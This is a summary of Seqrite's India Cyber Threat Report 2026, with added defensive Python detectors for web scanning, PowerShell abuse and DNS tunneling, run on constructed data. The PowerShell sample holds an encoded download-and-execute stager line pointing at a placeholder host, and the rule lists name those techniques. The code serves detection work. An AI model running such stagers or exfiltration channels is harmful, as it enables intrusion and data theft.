Seqrite, the enterprise cybersecurity division of Quick Heal Technologies Limited, has released the India Cyber Threat Report 2026, an analysis of 265.52 million malware detections across more than 8 million endpoints between October 2024 and September 2025. That volume works out to roughly 505 detections per minute processed by Seqrite's malware analysis laboratory.
By state, Maharashtra leads with 36.13 million detections, followed by Gujarat (24.13 million) and Delhi NCR (15.41 million); by city, Mumbai (16.59 million), New Delhi (15.32 million) and Kolkata (11.87 million) are the most targeted. The report ties these concentrations to the density of financial services, government and industrial operations in those regions, which raises the payoff of a successful intrusion. One caveat when reading the percentages below: they are quoted from the report and are not shares of the 265.52 million headline total (36.13 / 265.52 is about 13.6%, not 24.31%); the figures correspond to a base of roughly 148.6 million detections that this summary does not identify.
State Threat Distribution
| Rank | State | Detections (Millions) | Share (as reported) |
|---|---|---|---|
| 1 | Maharashtra | 36.13 | 24.31% |
| 2 | Gujarat | 24.13 | 16.24% |
| 3 | Delhi NCR | 15.41 | 10.37% |
City Threat Distribution
| Rank | City | Detections (Millions) | Share (as reported) |
|---|---|---|---|
| 1 | Mumbai | 16.59 | 11.17% |
| 2 | New Delhi | 15.32 | 10.31% |
| 3 | Kolkata | 11.87 | 7.99% |
Urban threat density tracks the digital-economy hubs where SMBs and enterprises expose unpatched endpoints, typically through cracked software (Adobe, VLC) and social-engineering vectors (malicious attachments, drive-by downloads).
Malware Taxonomy: Trojans and Infectors Reign Supreme
Trojans (43%) and file infectors (35%) together account for 78% of detections, which says how heavily adversaries lean on families built to persist on a host:
- Banker trojans target UPI/Netbanking (RAT capabilities)
- Info-stealers harvest credentials, crypto wallets
- File infectors spread through macro-enabled Office documents and gaps in legacy AV coverage
Detection share by sector:
| Sector | Detection Share | Key Vectors |
|---|---|---|
| Education | 20% | Student portals, LMS exploits |
| Healthcare | 15% | Telemedicine, EHR ransomware |
| Manufacturing | 12% | OT/SCADA legacy, supply chain |
Of 9.2 million vulnerability scans observed, WordPress (4.2M), Apache Tomcat (2.1M) and SysAid (1.8M) were the most-probed targets, a sign that web-facing assets are being left unpatched and unmonitored.
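The scanning pattern the report describes is visible in ordinary web-server access logs: one source walks the well-known admin and login paths of several unrelated products and mostly collects 4xx responses. The following detector is an added example written for this page, not code from Seqrite or the report; the log lines are constructed, and the probe-path lists and thresholds are illustrative assumptions rather than a complete fingerprint set.

```python
import re
from collections import defaultdict

# Constructed combined-format access-log lines (not real traffic). One host probes
# admin/login paths of all three products named in the report, one host only logs
# into WordPress, and one ordinary visitor trips a single Tomcat path.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2025:10:01:02 +0530] "GET /wp-login.php HTTP/1.1" 404 196 "-" "python-requests/2.31"
203.0.113.7 - - [12/Mar/2025:10:01:03 +0530] "GET /xmlrpc.php HTTP/1.1" 404 196 "-" "python-requests/2.31"
203.0.113.7 - - [12/Mar/2025:10:01:04 +0530] "GET /manager/html HTTP/1.1" 401 0 "-" "python-requests/2.31"
203.0.113.7 - - [12/Mar/2025:10:01:05 +0530] "GET /sysaid/Login.jsp?x=1 HTTP/1.1" 404 196 "-" "python-requests/2.31"
198.51.100.9 - - [12/Mar/2025:10:02:10 +0530] "GET /wp-login.php HTTP/1.1" 200 1450 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2025:10:02:40 +0530] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Mar/2025:10:03:00 +0530] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Mar/2025:10:03:01 +0530] "GET /manager/html HTTP/1.1" 401 0 "-" "Mozilla/5.0"
"""

# Paths scanners commonly request for each product. Assumption: a short illustrative
# list, not an exhaustive fingerprint set. Paths are compared lower-cased.
PROBE_PATHS = {
    "wordpress": {"/wp-login.php", "/xmlrpc.php", "/wp-admin/", "/wp-config.php.bak"},
    "tomcat": {"/manager/html", "/host-manager/html", "/manager/text"},
    "sysaid": {"/sysaid/login.jsp", "/sysaid/userentry"},
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_lines(text):
    """Yield (ip, path without query string, status) for each line matching the log format."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            path = m.group("path").split("?", 1)[0].lower()
            yield m.group("ip"), path, int(m.group("status"))


def probe_activity(text):
    """Per source IP: which products' probe paths it touched, how many probe requests it
    made, and how many of those failed with 4xx (the signature of blind enumeration)."""
    activity = defaultdict(lambda: {"products": set(), "probes": 0, "failed": 0})
    for ip, path, status in parse_lines(text):
        for product, paths in PROBE_PATHS.items():
            if path in paths:
                rec = activity[ip]
                rec["products"].add(product)
                rec["probes"] += 1
                if 400 <= status < 500:
                    rec["failed"] += 1
    return activity


def suspected_scanners(text, min_products=2, min_failed_ratio=0.5):
    """Flag sources that probe more than one product and mostly receive 4xx responses.
    A legitimate administrator works on one product and usually succeeds."""
    flagged = {}
    for ip, rec in probe_activity(text).items():
        if not rec["probes"]:
            continue
        ratio = rec["failed"] / rec["probes"]
        if len(rec["products"]) >= min_products and ratio >= min_failed_ratio:
            flagged[ip] = {"products": sorted(rec["products"]), "failed_ratio": round(ratio, 2)}
    return flagged


if __name__ == "__main__":
    for ip, info in suspected_scanners(SAMPLE_LOG).items():
        print(ip, info)
```

The cross-product requirement is what separates the scanner from the WordPress user who simply mistyped a password: a single source touching WordPress, Tomcat and SysAid paths on one host has no legitimate reason to exist. The check runs per host, so a scanner that probes only WordPress across thousands of hosts needs the same logic applied to logs aggregated from a fleet.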
Threat Evolution: From Episodic to Automation-Driven
Seqrite documents a shift from episodic attacks to continuous, automated campaigns: botnets (Mirai variants) scan without pause, RaaS marketplaces (LockBit 3.0 successors) commoditise intrusion, and AI-assisted phishing produces personalised lures at scale. Fileless malware evades signature-based defences, and living-off-the-land techniques use PowerShell and WMI for execution and command-and-control that blends into routine administration.
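Living-off-the-land activity of the kind described above leaves its trace in process-creation telemetry rather than in files on disk, so detection has to read command lines, including the base64 argument of PowerShell's -EncodedCommand. The triage routine below is an added example for this page, not code from Seqrite or the report; the four event records are constructed, and the indicator list and scoring weights are illustrative assumptions rather than a tuned production rule.

```python
import base64
import re


def ps_encode(script):
    """The transform -EncodedCommand expects: UTF-16LE text, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation records (not real telemetry); the shape loosely follows a
# Sysmon Event ID 1 / EDR feed. Record 1 is a classic download-and-execute stager,
# 2 a scheduled admin script, 3 WMI launching a hidden shell, 4 routine use.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ps_encode(PAYLOAD)},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic.exe process call create "powershell.exe -w hidden -c Get-Process"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Get-Service"},
]

# -EncodedCommand and the abbreviations PowerShell accepts (-e, -ec, -en, -enc, ...).
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")

# (regex applied to the lower-cased text, weight). Assumption: illustrative, not exhaustive.
INDICATORS = [
    (r"\b(?:iex|invoke-expression)\b", 2),
    (r"\b(?:downloadstring|downloadfile)\b", 2),
    (r"\bprocess call create\b", 2),                      # WMI-driven process launch
    (r"\b(?:net\.webclient|invoke-webrequest|frombase64string)\b", 1),
    (r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", 1),
    (r"(?:^|\s)-nop(?:rofile)?\b", 1),
    (r"\bbypass\b", 1),
]
THRESHOLD = 3


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(cmdline):
    """Score the visible command line plus whatever the encoded argument decodes to."""
    score, reasons = 0, []
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        score += 2
        reasons.append("encoded command decodes to: " + decoded)
        text += " " + decoded
    low = text.lower()
    for pattern, weight in INDICATORS:
        if re.search(pattern, low):
            score += weight
            reasons.append(pattern)
    return score, reasons


def triage(events, threshold=THRESHOLD):
    """Return the events whose score reaches the threshold, highest score first."""
    hits = []
    for ev in events:
        score, reasons = score_command(ev["cmdline"])
        if score >= threshold:
            hits.append({"image": ev["image"], "score": score, "reasons": reasons})
    return sorted(hits, key=lambda h: -h["score"])


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["score"], hit["image"], hit["reasons"])
```

Decoding before matching is the point: the stager's IEX and DownloadString never appear in the raw command line, and a rule that only inspects visible text scores it on the -nop and -w hidden switches alone. The weighting also keeps the scheduled backup script (ExecutionPolicy Bypass on its own) below the threshold, which is the kind of false positive that gets such a rule switched off in production.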
2025 attack lifecycle:
- Recon (Shodan scans)
- Delivery (spear-phishing, watering holes)
- Exploitation (zero-days, N-day chains)
- Persistence (registry runkeys, scheduled tasks)
- Exfiltration (DNS tunneling, MEGA exfil)
Monetization maturity: Credential stuffing → ransomware → data auctions.
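The exfiltration stage of the lifecycle above names DNS tunneling, which hides data in query names and rides out through a resolver that most perimeters allow unconditionally. The profiler below is an added example for this page, not code from Seqrite or the report; the query log is constructed, the zone split assumes the registrable domain is the last two labels (a real deployment would use the public suffix list), and the thresholds are illustrative assumptions.

```python
import hashlib
import math
from collections import Counter, defaultdict

# Constructed DNS query log as (client, qname, qtype) tuples, not real traffic: a few
# ordinary lookups, plus 32 TXT queries that carry 20-byte data chunks as hex in the
# leftmost label, which is the shape of a DNS exfiltration channel.
NORMAL = [
    ("10.0.0.5", "www.example.com", "A"), ("10.0.0.5", "mail.example.com", "MX"),
    ("10.0.0.6", "www.example.com", "A"), ("10.0.0.6", "cdn.example.org", "A"),
    ("10.0.0.7", "static.cdn.example.org", "AAAA"), ("10.0.0.7", "www.example.com", "A"),
]
TUNNEL = [
    ("10.0.0.9", hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:40] + ".t.example.net", "TXT")
    for i in range(32)
]
SAMPLE_QUERIES = NORMAL + TUNNEL


def shannon_entropy(s):
    """Bits per character: hex data tops out near 4.0, human-chosen labels sit far lower."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def split_qname(qname):
    """Split a query name into (zone, subdomain). Assumption: zone = last two labels."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return ".".join(labels), ""
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def profile_zones(queries):
    """Aggregate per zone: query count, distinct subdomains, subdomain text, TXT/NULL count."""
    zones = defaultdict(lambda: {"queries": 0, "subdomains": set(), "sub_text": [], "txt": 0})
    for _client, qname, qtype in queries:
        zone, sub = split_qname(qname)
        z = zones[zone]
        z["queries"] += 1
        z["subdomains"].add(sub)
        z["sub_text"].append(sub.replace(".", ""))
        if qtype in ("TXT", "NULL"):
            z["txt"] += 1
    return zones


def suspected_tunnels(queries, min_unique=20, min_mean_len=30, min_entropy=3.5):
    """Flag zones with many distinct, long, high-entropy subdomains. Any one signal
    alone misfires (CDNs have many subdomains, a long hostname is not data), so all
    three must hold together."""
    flagged = {}
    for zone, z in profile_zones(queries).items():
        uniq = len(z["subdomains"])
        mean_len = sum(len(s) for s in z["sub_text"]) / z["queries"]
        entropy = shannon_entropy("".join(z["sub_text"]))
        if uniq >= min_unique and mean_len >= min_mean_len and entropy >= min_entropy:
            flagged[zone] = {
                "unique_subdomains": uniq,
                "mean_subdomain_len": round(mean_len, 1),
                "entropy": round(entropy, 2),
                "txt_share": round(z["txt"] / z["queries"], 2),
            }
    return flagged


if __name__ == "__main__":
    for zone, info in suspected_tunnels(SAMPLE_QUERIES).items():
        print(zone, info)
```

Per-zone aggregation matters more than any single threshold: an individual 40-character label is unremarkable, but dozens of never-repeated ones under one zone, each of them random-looking and answered by TXT records, is a channel rather than a lookup. The TXT share is reported rather than enforced because a tunnel can just as well use A or CNAME queries and put the downstream data in the answer.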
2026 Cognitive Threat Horizon
Looking toward 2026, Seqrite forecasts the rise of cognitive intrusions powered by artificial intelligence, where adversaries leverage large language models to chain vulnerabilities automatically, generate convincing deepfake deception campaigns, and maintain persistence through autonomous agent swarms. India’s unique risk profile amplifies these threats, with over 1 billion monthly UPI transactions, persistent Aadhaar database exposures, and the rapid digital banking adoption across Tier-2 and Tier-3 cities creating unprecedented attack surfaces.
